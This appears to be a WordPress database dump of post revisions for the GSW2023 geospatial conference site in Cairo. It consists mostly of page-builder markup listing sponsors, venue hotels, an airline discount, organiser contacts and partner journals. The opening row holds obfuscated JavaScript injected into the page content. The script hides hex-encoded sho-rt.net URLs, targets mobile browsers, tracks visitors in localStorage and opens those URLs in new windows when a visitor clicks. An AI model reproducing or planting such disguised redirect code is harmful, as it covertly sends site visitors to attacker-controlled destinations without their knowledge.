_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 03:48:03','2023-08-13 03:48:03','',3066,'https://gsw2023.com/?p=5094',0,'revision','',0),
(5095,1,'2023-08-13 03:49:01','2023-08-13 03:49:01','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\">Prime Sponsor</span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]\r\n\r\n<img class=\"alignnone wp-image-5093 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 105px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" 